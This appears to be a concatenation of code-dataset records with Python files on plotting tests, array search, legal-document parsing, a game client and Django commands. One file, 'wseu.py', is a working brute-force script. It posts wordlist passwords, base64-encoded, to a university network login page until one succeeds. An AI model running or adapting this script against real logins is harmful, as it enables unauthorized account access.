(x, -5, 5), params={u: 1})\n assert isinstance(s, InteractiveSeries)\n\n s = _build_series(Eq(x ** 2 + y ** 2, 5), (x, -5, 5), (y, -2, 2))\n assert isinstance(s, ImplicitSeries)\n\n s = _build_series(Eq(x ** 2 + y ** 2, 5) & (x > y), (x, -5, 5), (y, -2, 2))\n assert isinstance(s, ImplicitSeries)\n\n # test mapping\n s = _build_series(cos(x), (x, -5, 5), pt=\"p\")\n assert isinstance(s, LineOver1DRangeSeries)\n\n s = _build_series(cos(x), sin(x), (x, -5, 5), pt=\"pp\")\n assert isinstance(s, Parametric2DLineSeries)\n\n s = _build_series(cos(x), sin(x), x, (x, -5, 5), pt=\"p3dl\")\n assert isinstance(s, Parametric3DLineSeries)\n\n s = _build_series(cos(x + y), (x, -5, 5), (y, -3, 3), pt=\"p3d\")\n assert isinstance(s, SurfaceOver2DRangeSeries)\n\n # one missing rage\n s = _build_series(cos(x + y), (x, -5, 5), pt=\"p3d\")\n assert isinstance(s, SurfaceOver2DRangeSeries)\n\n s = _build_series(cos(x + y), sin(x + y), x, (x, -5, 5), (y, -3, 3), pt=\"p3ds\")\n assert isinstance(s, ParametricSurfaceSeries)\n\n # missing ranges\n s = _build_series(cos(x + y), sin(x + y), x, pt=\"p3ds\")\n assert isinstance(s, ParametricSurfaceSeries)\n\n s = _build_series(u * cos(x), (x, -5, 5), params={u: 1}, pt=\"pinter\")\n assert isinstance(s, InteractiveSeries)\n\n s = _build_series(\n u * sqrt(x), (x, -5, 5), params={u: 1}, pt=\"pinter\", is_complex=True\n )\n assert isinstance(s, ComplexInteractiveSeries)\n\n\ndef test_geometry():\n def do_test(*g, s=GeometrySeries, **kwargs):\n s1 = _build_series(*g, pt=\"g\", **kwargs)\n assert isinstance(s1, s)\n # since the range could be None, it is imperative to test that label\n # receive the correct value.\n assert s1.label == str(g[0])\n s2 = _build_series(*g, **kwargs)\n assert isinstance(s2, s)\n assert s2.label == str(g[0])\n assert np.array_equal(s1.get_data(), s2.get_data(), equal_nan=True)\n\n x, y, z = symbols(\"x, y, z\")\n do_test(Point2D(1, 2))\n do_test(Point3D(1, 2, 3))\n do_test(Ray((1, 2), (3, 4)))\n do_test(Segment((1, 2), (3, 4)))\n do_test(Line((1, 2), (3, 4)), (x, -5, 5))\n do_test(Ray3D((1, 2, 3), (3, 4, 5)))\n do_test(Segment3D((1, 2, 3), (3, 4, 5)))\n do_test(Line3D((1, 2, 3), (3, 4, 5)))\n do_test(Polygon((1, 2), 3, n=10))\n do_test(Circle((1, 2), 3))\n do_test(Ellipse((1, 2), hradius=3, vradius=2))\n do_test(\n Plane((0, 0, 0), (1, 1, 1)), (x, -5, 5), (y, -4, 4), (z, -3, 3), s=PlaneSeries\n )\n\n # Interactive series. Note that GeometryInteractiveSeries is an instance of\n # GeometrySeries\n do_test(Point2D(x, y), params={x: 1, y: 2})\n do_test(\n Plane((x, y, z), (1, 1, 1)),\n (x, -5, 5),\n (y, -4, 4),\n (z, -3, 3),\n params={x: 1, y: 2, z: 3},\n s=PlaneInteractiveSeries,\n )\n\n\ndef test_vectors():\n x, y, z = symbols(\"x:z\")\n N = CoordSys3D(\"N\")\n v1 = x * N.i + y * N.j\n v2 = z * N.i + x * N.j + y * N.k\n m1 = v1.to_matrix(N)\n m2 = v2.to_matrix(N)\n l1 = list(m1)\n # I need a 2D vector: delete the last component, which is zero\n l1 = l1[:-1]\n l2 = list(m2)\n\n # 2D vectors\n s = _build_series(v1, (x, -10, 10), (y, -5, 5))\n assert isinstance(s, Vector2DSeries)\n s = _build_series(m1, (x, -10, 10), (y, -5, 5))\n assert isinstance(s, Vector2DSeries)\n s = _build_series(l1, (x, -10, 10), (y, -5, 5))\n assert isinstance(s, Vector2DSeries)\n s = _build_series(v1, (x, -10, 10), (y, -5, 5), pt=\"v2d\")\n assert isinstance(s, Vector2DSeries)\n s = _build_series(m1, (x, -10, 10), (y, -5, 5), pt=\"v2d\")\n assert isinstance(s, Vector2DSeries)\n s = _build_series(l1, (x, -10, 10), (y, -5, 5), pt=\"v2d\")\n assert isinstance(s, Vector2DSeries)\n\n s = _build_series(v2, (x, -10, 10), (y, -5, 5), (z, -8, 8))\n assert isinstance(s, Vector3DSeries)\n s = _build_series(m2, (x, -10, 10), (y, -5, 5), (z, -8, 8))\n assert isinstance(s, Vector3DSeries)\n s = _build_series(l2, (x, -10, 10), (y, -5, 5), (z, -8, 8))\n assert isinstance(s, Vector3DSeries)\n s = _build_series(v2, (x, -10, 10), (y, -5, 5), (z, -8, 8), pt=\"v3d\")\n assert isinstance(s, Vector3DSeries)\n s = _build_series(m2, (x, -10, 10), (y, -5, 5), (z, -8, 8), pt=\"v3d\")\n assert isinstance(s, Vector3DSeries)\n s = _build_series(l2, (x, -10, 10), (y, -5, 5), (z, -8, 8), pt=\"v3d\")\n assert isinstance(s, Vector3DSeries)\n s = _build_series(\n l2, (x, -10, 10), (y, -5, 5), (z, -8, 8), slice=Plane((-2, 0, 0), (1, 0, 0))\n )\n assert isinstance(s, SliceVector3DSeries)\n\n\ndef test_complex():\n x, y, z = symbols(\"x:z\")\n e1 = 1 + exp(-Abs(x)) * sin(I * sin(5 * x))\n\n def do_test_1(s, n):\n assert isinstance(s, ComplexSeries)\n data = s.get_data()\n assert len(data) == n\n return data\n\n def test_equal_results(data1, data2):\n for i, (d1, d2) in enumerate(zip(data1, data2)):\n print(\"i = {}\".format(i))\n assert np.array_equal(d1, d2)\n\n ### Complex line plots: use adaptive=False in order to compare results.\n\n # return x, mag(e1), arg(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, absarg=True)\n data1 = do_test_1(s1, 3)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, absarg=True, pt=\"c\")\n data2 = do_test_1(s2, 3)\n test_equal_results(data1, data2)\n\n # return x, real(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, real=True)\n data1 = do_test_1(s1, 2)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, real=True, pt=\"c\")\n data2 = do_test_1(s2, 2)\n test_equal_results(data1, data2)\n xx, real = data1\n\n # return x, imag(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, imag=True)\n data1 = do_test_1(s1, 2)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, imag=True, pt=\"c\")\n data2 = do_test_1(s2, 2)\n test_equal_results(data1, data2)\n _, imag = data1\n\n # return x, real(e1), imag(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, real=True, imag=True)\n data1 = do_test_1(s1, 3)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, real=True, imag=True, pt=\"c\")\n data2 = do_test_1(s2, 3)\n test_equal_results(data1, data2)\n test_equal_results(data1, (xx, real, imag))\n\n # return x, abs(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, abs=True)\n data1 = do_test_1(s1, 2)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, abs=True, pt=\"c\")\n data2 = do_test_1(s2, 2)\n test_equal_results(data1, data2)\n xx, _abs = data1\n\n # return x, arg(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, arg=True)\n data1 = do_test_1(s1, 2)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, arg=True, pt=\"c\")\n data2 = do_test_1(s2, 2)\n test_equal_results(data1, data2)\n _, arg = data1\n\n # return x, abs(e1), arg(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, absarg=True)\n data1 = do_test_1(s1, 3)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, absarg=True, pt=\"c\")\n data2 = do_test_1(s2, 3)\n test_equal_results(data1, data2)\n test_equal_results(data1, (xx, _abs, arg))\n\n # return x, e1 (complex numbers)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, real=False, imag=False)\n data1 = do_test_1(s1, 2)\n test_equal_results((data1[0],), (xx,))\n assert any(isinstance(d, complex) for d in data1[1].flatten())\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, real=False, imag=False, pt=\"c\")\n data2 = do_test_1(s2, 2)\n test_equal_results(data1, data2)\n\n ### Lists of complex numbers: returns real, imag\n e2 = z * exp(2 * pi * I * z)\n l2 = [e2.subs(z, t / 20) for t in range(20)]\n s = _build_series(l2)\n do_test_1(s, 2)\n\n ### Domain coloring: returns x, y, (mag, arg), ...\n s1 = _build_series(gamma(z), (z, -3 - 3 * I, 3 + 3 * I))\n data1 = do_test_1(s1, 5)\n s2 = _build_series(gamma(z), (z, -3 - 3 * I, 3 + 3 * I), pt=\"c\")\n data2 = do_test_1(s2, 5)\n test_equal_results(data1, data2)\n xx, yy, mag_arg, _, _ = data1\n mag, arg = mag_arg[:, :, 0], mag_arg[:, :, 1]\n\n ### 3D real part\n s1 = _build_series(gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, real=True)\n data1 = do_test_1(s1, 3)\n s2 = _build_series(\n gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, real=True, pt=\"c\"\n )\n data2 = do_test_1(s2, 3)\n test_equal_results(data1, data2)\n xx, yy, real = data1\n\n ### 3D imaginary part\n s1 = _build_series(gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, imag=True)\n data1 = do_test_1(s1, 3)\n s2 = _build_series(\n gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, imag=True, pt=\"c\"\n )\n data2 = do_test_1(s2, 3)\n test_equal_results(data1, data2)\n _, _, imag = data1\n\n ### 3D real and imaginary parts\n s1 = _build_series(\n gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, real=True, imag=True\n )\n data1 = do_test_1(s1, 4)\n s2 = _build_series(\n gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, real=True, imag=True, pt=\"c\"\n )\n data2 = do_test_1(s2, 4)\n test_equal_results(data1, data2)\n _, _, real2, imag2 = data1\n test_equal_results((real, imag), (real2, imag2))\n","sub_path":"tests/test_plot_data.py","file_name":"test_plot_data.py","file_ext":"py","file_size_in_byte":10927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142272487","text":"'''\nRemove all small images\n\nToo bad for training\n'''\nimport os\nimport glob\n\nPATH = \"dataset\"\n\nexp = PATH+\"/*/*.jpg\"\n\nthesh = 10990 + 10\n\nfor path in glob.glob(exp):\n if os.path.getsize(path) < thesh:\n os.remove(path)\n print(\"Removed {}\".format(path))","sub_path":"src/folder_actions/remove_small.py","file_name":"remove_small.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"367708599","text":"def search_reverse(list_, k):\n i = len(list_) - 1\n\n while i >= 0:\n if list_[i] < k:\n return None\n if list_[i] == k:\n return i\n i -= 1\n return None\n\n\ndef search_(list_, k):\n for i in range(len(list_)):\n if list_[i] > k:\n return None\n if list_[i] == k:\n return i\n return None\n\n\n# Search an element in a sorted and rotated array\ndef run(list_, el):\n if list_[0] < el:\n print(search_(list_, el))\n else:\n print(search_reverse(list_, el))\n\n\nif __name__ == '__main__':\n run([15, 17, 18, 19, 20, 21, 3, 8, 9, 10, 11], 11)","sub_path":"src/find_sorted_rotated_array.py","file_name":"find_sorted_rotated_array.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"540394305","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# coding=utf-8\n\n\nimport os\nimport pickle\nimport re\nimport unittest\n\nfrom analyser.contract_agents import ORG_LEVELS_re\nfrom analyser.contract_patterns import ContractPatternFactory\nfrom analyser.legal_docs import LegalDocument\nfrom analyser.ml_tools import SemanticTag\nfrom analyser.parsing import AuditContext\nfrom analyser.persistence import DbJsonDoc\nfrom analyser.protocol_parser import find_protocol_org, find_org_structural_level, protocol_votes_re, ProtocolDocument\nfrom analyser.runner import Runner\nfrom analyser.structures import OrgStructuralLevel\nfrom tests.test_utilits import load_json_sample\n\n\nclass TestProtocolParser(unittest.TestCase):\n\n def test_read_json(self):\n data = load_json_sample('protocol_1.json')\n print(data['parse'])\n\n def test_protocol_processor(self):\n json_doc = load_json_sample('protocol_1.json')\n jdoc = DbJsonDoc(json_doc)\n legal_doc = jdoc.asLegalDoc()\n\n # print (doc)\n\n pp = Runner.get_instance().protocol_parser\n # pp.find_org_date_number(legal_doc, AuditContext())\n legal_doc:ProtocolDocument = pp.find_attributes(legal_doc, AuditContext())\n\n orgtags = legal_doc.org_tags\n for t in orgtags:\n print(t)\n\n def tag_val(name):\n tag = SemanticTag.find_by_kind(orgtags, name)\n if tag is not None:\n return tag.value\n\n self.assertEqual('Газпромнефть Шиппинг', tag_val('org-1-name'))\n self.assertEqual('Общество с ограниченной ответственностью', tag_val('org-1-type'))\n\n def get_doc(self, fn) -> (LegalDocument, ContractPatternFactory):\n pth = os.path.dirname(__file__)\n with open(os.path.join(pth, fn), 'rb') as handle:\n doc = pickle.load(handle)\n\n self.assertEqual(1024, doc.embeddings.shape[-1])\n\n return doc\n\n def test_load_picke(self):\n doc = self.get_doc('Протокол_СД_ 3.docx.pickle')\n doc: LegalDocument = doc\n for p in doc.paragraphs:\n print('😱 \\t', doc.get_tag_text(p.header).strip(), '📂')\n\n def test_find_protocol_org_1(self):\n suff = ' ' * 1000\n\n txt = '''Протокол № 3/2019 Проведения итогов заочного голосования Совета директоров Общества с ограниченной ответственностью «Технологический центр «Бажен» (далее – ООО «Технологический центр «Бажен») г. Санкт-Петербург Дата составления протокола «__» _______ 2019 года\n Дата окончания приема бюллетеней для голосования членов Совета директоров «___»__________ 2019 года.\n ''' + suff\n doc = ProtocolDocument(LegalDocument(txt))\n doc.parse()\n tags = find_protocol_org(doc)\n self.assertEqual('Технологический центр «Бажен»', tags[0].value)\n self.assertEqual('Общество с ограниченной ответственностью', tags[1].value)\n\n def test_find_protocol_org_2(self):\n doc = self.get_doc('Протокол_СД_ 3.docx.pickle')\n doc.parse()\n print(doc[0:200].text)\n tags = find_protocol_org(doc)\n self.assertEqual('Технологический центр «Бажен»', tags[0].value)\n self.assertEqual('Общество с ограниченной ответственностью', tags[1].value)\n\n def test_ORG_LEVELS_re(self):\n suff = ' ' * 300\n t = '''\n ПРОТОКОЛ\nзаседания Совета директоров ООО «Газпромнефть- Корпоративные продажи» (далее – ООО «Газпромнефть- Корпоративные продажи» или «Общество»)\nМесто проведения заседания:\u0007\n''' + suff\n r = re.compile(ORG_LEVELS_re, re.MULTILINE | re.IGNORECASE | re.UNICODE)\n x = r.search(t)\n self.assertEqual('Совета директоров', x['org_structural_level'])\n\n def test_find_org_structural_level(self):\n t = '''\n ПРОТОКОЛ \\\n заседания Совета директоров ООО «Газпромнефть - Внеземная Любофьи» (далее – ООО «Газпромнефть-ВНЛ» или «Общество»)\\\n Место проведения заседания:\u0007\n ''' + ' ' * 900\n doc = LegalDocument(t)\n doc.parse()\n\n tags = list(find_org_structural_level(doc))\n self.assertEqual(OrgStructuralLevel.BoardOfDirectors.name, tags[0].value)\n\n def test_find_org_structural_level_2(self):\n t = '''\n ПРОТОКОЛ ночного заседания Правления общества ООО «Газпромнефть - Внеземная Любофь» (далее – ООО «Газпромнефть- ВНЛ» или «Общество»)\\\n Место проведения заседания:\u0007\n ''' + ' ' * 900\n doc = LegalDocument(t)\n doc.parse()\n\n tags = list(find_org_structural_level(doc))\n self.assertEqual(OrgStructuralLevel.BoardOfCompany.name, tags[0].value)\n\n def test_find_protocol_votes(self):\n doc = self.get_doc('Протокол_СД_ 3.docx.pickle')\n x = protocol_votes_re.search(doc.text)\n\n # for f in x:\n print(doc.text[x.span()[0]:x.span()[1]])\n\n def test_find_protocol_votes_re(self):\n t = '''\nПредварительно утвердить годовой отчет Общества за 2017 год.\nИтоги голосования:\n «ЗА» 8;\n«ПРОТИВ» нет;\n«ВОЗДЕРЖАЛСЯ» нет.\nРЕШЕНИЕ ПРИНЯТО.\nРешение, принятое по первому вопросу повестки дня:\nПредварительно утвердить годовой отчет Общества за 2017 год.'''\n\n doc = LegalDocument(t)\n doc.parse()\n\n x = protocol_votes_re.search(doc.text)\n\n match = doc.text[x.span()[0]:x.span()[1]]\n print(f'[{match}]')\n\n\nunittest.main(argv=['-e utf-8'], verbosity=3, exit=False)\n","sub_path":"tests/test_protocol_parser.py","file_name":"test_protocol_parser.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"393309238","text":"import math\nprint(\"Metodo de Newton\")\nprint(\"###############################\")\nprint(\"Qual a aproximacao inicial X0 e a precisao e?\")\n\nx0 = float(input(\"Entre com x0:\"))\ne = float(input(\"Entre com e:\"))\ni=0\ncd=8 #numero de casa decimais para arredondamento de Wx\n\ndef funcao(x):\n fx = (2*x)-math.sin(x)-4\n return fx\n\ndef funcao_d1(x):\n fx = 2-math.cos(x)\n return fx\n\ndef funcao_d2(x):\n fx = math.sin(x)\n return fx\n\ndef Wx(x): # Funcao de interacao\n ## X[i+1] = X[i]-f[x(i)]/f[x(i)]\n Wx = x - (funcao(x)/funcao_d1(x))\n print(\"[X_i:%d] Fx: %.5f | F'X: %.5f\"% (x, funcao(x), funcao_d1(x)))\n return Wx\n\n#Fazendo as iteracoes\nwhile True:\n i+=1\n x = Wx(x0)\n print(\"[%d] x_i: %.5f | x_i+1: %.5f | erro: %.3f | tolerancia:%.3f \"% (i, x0, x, abs(x-x0), e))\n if abs(x-x0)> 2) & 0x3\n if upd_hi == 1:\n index = self.ring.queue.qstate.get_cindex(ring_id)\n elif upd_hi == 2:\n index = self.ring.queue.qstate.get_pindex(ring_id)\n else:\n index = 0\n #lgh.info(\"UPD: %d Hi: %d, Lo: %d, Index: %d\" % (upd, upd_hi, upd_lo, index))\n\n pid = getattr(test_spec, 'pid', 0)\n\n address = 0x400000 + (upd << 17) + (lif_id << 6) + (queue_type << 3)\n data = (pid << 48) | (queue_id << 24) | (ring_id << 16) | index\n\n lgh.info(\"Ringing Doorbell: %s\" % self.GID())\n lgh.info(\"- Addr:0x%x (Qtype:%d/LIF:%d/Upd:%d)\" %\n (address, queue_type, lif_id, upd))\n lgh.info(\"- Data:0x%x (Pindex:%d/RingID:%d/QID:%d/PID:%d)\" %\n (data, index, ring_id, queue_id, pid))\n\n model_wrap.step_doorbell(address, data)\n","sub_path":"dol/iris/config/objects/rdma/doorbell.py","file_name":"doorbell.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407759348","text":"import socket\nimport pygame\nimport msgpack\nimport random\nimport time\n\n\nWIDTH = 800\nHEIGHT = 800\n\nclass ClientPlayer:\n\tdef __init__(self, name=\"unknown\", start_x=0.0, start_y=0.0):\n\t\tself.x = start_x\n\t\tself.y = start_y\n\t\tself.name = name\n\t\tself.size = 15\n\t\tself.speed = 1.0\n\t\tself.color = (255, 255, 255)\n\t\tself.angle_d = 0\n\t\tself.keys_down = []\n\n\t\tself.surface = None\n\t\tself.render_self()\n\n\tdef render_self(self):\n\t\tself.surface = pygame.Surface((int(self.size * 4), int(self.size * 4)))\n\t\tpygame.draw.circle(self.surface, self.color, \n\t\t\t(int(self.surface.get_width() / 2), \n\t\t\t\tint(self.surface.get_height() / 2)), \n\t\t\tint(self.size))\n\t\tpygame.draw.rect(self.surface, self.color, \n\t\t\t(int((self.surface.get_width() / 2) - self.size / 4), \n\t\t\t\tint((self.surface.get_height() / 2) ), \n\t\t\t\tint(self.size / 2), \n\t\t\t\tint(self.size * 1.5)))\n\n\tdef load_dict(self, variables):\n\t\tself.x = variables['x']\n\t\tself.y = variables['y']\n\t\tself.name = variables['name']\n\t\tself.size = variables['size']\n\t\tself.color = variables['color']\n\t\tself.angle_d = variables['angle_d']\n\t\tself.keys_down = variables['keys_down']\n\n\t\tself.render_self()\n\n\tdef render(self, surface):\n\t\ttemp_surface = pygame.transform.rotate(self.surface, self.angle_d)\n\t\tsurface.blit(temp_surface, (int(self.x - temp_surface.get_width() / 2), int(self.y - temp_surface.get_height() / 2)))\n\ndef send_net_message(client_socket, server_addr, message):\n\tshould_send = random.randint(1, 100)\n\tif should_send > 10:\n\t\tclient_socket.sendto(message.encode('utf-8'), server_addr)\n\n\ndef get_net_message(client_socket):\n\ttry:\n\t\tmessage, address = client_socket.recvfrom(1024)\n\texcept:\n\t\treturn None, None\n\n\treturn message, address\n\n\ndef process_net_message(client_socket, message, address):\n\tmessage = msgpack.loads(message, raw=False)\n\tif '' in message:\n\t\treturn None, None\n\telif ''.format(name))\n\ti = 0\n\twhile i < 1000:\n\t\tmessage, address = get_net_message(client_socket)\n\t\tif message is not None:\n\t\t\t_id = process_net_message(client_socket, message, address)\n\t\t\tbreak\n\t\ti += 1\n\telse:\n\t\tgame_running = False\n\t\tplayer_list = None\n\t\tprint(\"Failed to Join.\")\n\n\tprint('ID: {}'.format(_id))\n\n\tgame_state_dict = {}\n\tplayer_list = []\n\tprevious_keys_pressed = pygame.key.get_pressed()\n\n\talive_timer = 0\n\n\tstart = time.time()\n\twhile game_running:\n\t\tcurrent = time.time()\n\t\tdt = current - start\n\t\tstart = current\n\n\t\talive_timer += dt\n\t\tif alive_timer >= 0.5:\n\t\t\talive_timer = 0\n\t\t\tsend_net_message(client_socket, server_address, '')\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tgame_running = False\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\t\tgame_running = False\n\t\t\t\telse:\n\t\t\t \t\tsend_net_message(client_socket, server_address, ''.format(str(event.key)))\n\t\t\tif event.type == pygame.KEYUP:\n\t\t\t\t\tsend_net_message(client_socket, server_address, ''.format(str(event.key)))\n\n\t\twhile True:\n\t\t\tmessage, address = get_net_message(client_socket)\n\t\t\tif message is None:\n\t\t\t\tbreak\n\t\t\tgame_state_dict, player_list = process_net_message(client_socket, message, address)\n\t\t\tif game_state_dict is None and player_list is None:\n\t\t\t\tgame_running = False\n\n\t\tserver_keys_pressed = []\n\t\tif game_state_dict is not None:\n\t\t\tif int(_id) in game_state_dict['keys_down']:\n\t\t\t\tserver_keys_pressed = game_state_dict['keys_down'][int(_id)]\n\n\t\t#print(server_keys_pressed)\n\n\t\t# keys_pressed = pygame.key.get_pressed()\n\t\t# for i in range(0, len(keys_pressed)):\n\t\t# \tif keys_pressed[i] and not previous_keys_pressed[i] and i not in server_keys_pressed:\n\t\t# \t\tsend_net_message(client_socket, server_address, ''.format(str(i)))\n\t\t# \tif not keys_pressed[i] and previous_keys_pressed[i] and i not in server_keys_pressed:\n\t\t# \t\tsend_net_message(client_socket, server_address, ''.format(str(i)))\n\t\t# previous_keys_pressed = keys_pressed\n\n\t\tpygame.draw.rect(surface, (0, 0, 0), (0, 0, WIDTH, HEIGHT), 0)\n\n\t\tif player_list:\n\t\t\tfor player in player_list:\n\t\t\t\tplayer.render(surface)\n\n\t\tpygame.display.update()\n\n\tif player_list:\n\t\tsend_net_message(client_socket, server_address, '')\n\tpygame.display.quit()\n","sub_path":"gameclient.py","file_name":"gameclient.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"451646090","text":"import requests\nimport json\nimport base64\nimport time\nreq = requests.Session()\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'}\nprint(\"开始爆破......\")\nfor line in open('D:\\\\seu.txt'):\n line = line.strip('\\n')\n codestr = base64.b64encode(line.encode('UTF-8'))\n code = codestr.decode()\n #print(code)\n data = {\n 'enablemacauth':\t'0',\n 'password':\tcode,\n 'username':\t'seu'\n }\n signin = req.post('https://w.seu.edu.cn/index.php/index/login', data = data, headers = headers)\n tjson = json.loads(signin.text)\n #print(tjson[\"info\"])\n #t = base64.b64decode(line)\n #print(t)\n if tjson[\"info\"] == \"认证成功\":\n print(\"认证成功 \"+line)\n break\n\n\n","sub_path":"wseu.py","file_name":"wseu.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"233417937","text":"from django.core.management.base import BaseCommand\nfrom personnel.models import Personnel, PersonnelPermission\n\nmanager_permissions = [\n 'create_revenue',\n 'create_gameremit',\n 'create_debt', 'create_expenditure',\n 'create_month_check', 'start_monthly_check',\n 'create_viewcenterremit', 'create_division', 'create_team',\n]\n\nclass Command(BaseCommand):\n help = 'Grant common manager permissions'\n\n def add_arguments(self, parser):\n parser.add_argument('-email', type=str)\n\n def handle(self, *args, **options):\n self.stdout.write(self.style.SUCCESS('Update manager permissions'))\n email = options['email']\n\n person = Personnel.objects.get(user__email=email)\n\n # first strip user of all permissions\n for each in PersonnelPermission.objects.all():\n each.personnel.remove(person)\n self.stdout.write(self.style.SUCCESS('Finished removing all permissions.'))\n\n # # assign manager permissions\n for each in manager_permissions:\n permission = PersonnelPermission.objects.get(code_name=each)\n permission.personnel.add(person)\n self.stdout.write(self.style.SUCCESS(f'{person} successfully granted {permission}'))\n self.stdout.write(self.style.SUCCESS('Done'))\n","sub_path":"personnel/management/commands/make_manager.py","file_name":"make_manager.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633070786","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, unicode_literals\n\nimport logging\nimport os\nimport subprocess\n\nfrom spreads.plugin import HookPlugin, OutputHookMixin\nfrom spreads.util import MissingDependencyException, find_in_path\n\nif not find_in_path('pdfbeads'):\n raise MissingDependencyException(\"Could not find executable `pdfbeads` in\"\n \" $PATH. Please install the appropriate\"\n \" package(s)!\")\n\nlogger = logging.getLogger('spreadsplug.pdfbeads')\n\n\nclass PDFBeadsPlugin(HookPlugin, OutputHookMixin):\n __name__ = 'pdfbeads'\n\n def output(self, path):\n logger.info(\"Assembling PDF.\")\n img_dir = path / 'done'\n pdf_file = path / 'out' / \"{0}.pdf\".format(path.name)\n img_files = [unicode(x.name) for x in sorted(img_dir.glob('*.tif'))]\n cmd = [\"pdfbeads\", \"-d\"] + img_files + [\"-o\", unicode(pdf_file)]\n logger.debug(\"Running \" + \" \".join(cmd))\n # NOTE: pdfbeads only finds *html files for the text layer in the\n # working directory...\n os.chdir(unicode(img_dir))\n output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n logger.debug(\"Output:\\n{0}\".format(output))\n","sub_path":"spreadsplug/pdfbeads.py","file_name":"pdfbeads.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"252809079","text":"import subprocess\n\nfrom gitviewfs_objects import BlobFile\nfrom tests.structs.default import paths\nfrom tests.structs.default.utils import BaseDefaultDirStructTest,\\\n\tBaseDefaultDirStructIntegrationTest\n\n\nclass BlobFileTest(BaseDefaultDirStructTest):\n\t\n\tdef test_path(self):\n\t\tself.assertPathIs(paths.BLOB_FILE, BlobFile)\n\n\nclass BlobFileIntegrationTest(BaseDefaultDirStructIntegrationTest):\n\t\n\tdef test_blob_content(self):\n\t\tfilename, content = self.create_and_commit_file()\n\t\tblob_sha1 = subprocess.check_output(['git', 'hash-object', filename]).strip()\n\t\t\n\t\tblob_path = self.make_blob_file_path(blob_sha1)\n\t\twith open(blob_path) as f:\n\t\t\tread_content = f.read()\n\t\t\n\t\tself.assertEqual(read_content, content)\n","sub_path":"tests/structs/default/test_blob_file.py","file_name":"test_blob_file.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"28164359","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def longestUnivaluePath(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if root == None:\n return 0\n self.L = []\n self.checkPath(root)\n\n\n def checkPath(self, node):\n if node == None:\n return 0\n left = self.checkPath(node.left)\n right = self.checkPath(node.right)\n l = r = 0\n if node.left and node.left.val == node.val:\n l = left + 1\n if node.right and node.right.val == node.val:\n r = right + 1\n self.L.append(l + r + 1)\n return max(l, r)","sub_path":"longestUnivaluePath.py","file_name":"longestUnivaluePath.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"412043884","text":"# @copyright@\n# Copyright (c) 2006 - 2018 Teradata\n# All rights reserved. Stacki(r) v5.x stacki.com\n# https://github.com/Teradata/stacki/blob/master/LICENSE.txt\n# @copyright@\n\nimport time\nimport threading\nimport zmq\nimport json\nimport socket\nimport sys\nimport os\n\n\nclass ports:\n\t\"\"\"\n\tSocket port numbers used by the Stack Message Queue daemons.\n\n\t:var publish: UDP socket service for publishing a message\n\t:var subscribe: zmq.SUB socket for subscribing to a channel\n\t:var control: TCP socket service for enabling/disabling channel propagation\n\t\"\"\"\n\tpublish\t\t= 5000\n\tsubscribe\t= 5001\n\tcontrol\t\t= 5002\n\n\nclass Message():\n\t\"\"\"\n\tStack Message Queue Message\n\n\tA Message is composed of header fields and the *message* text body. For many\n\tapplications only body is manipulated and other fields are controlled by\n\tlower software levels. \n\n\tFor simple Messages the *message* body can be a string. For more complex Messages\n\tthe body should be a json encoded python 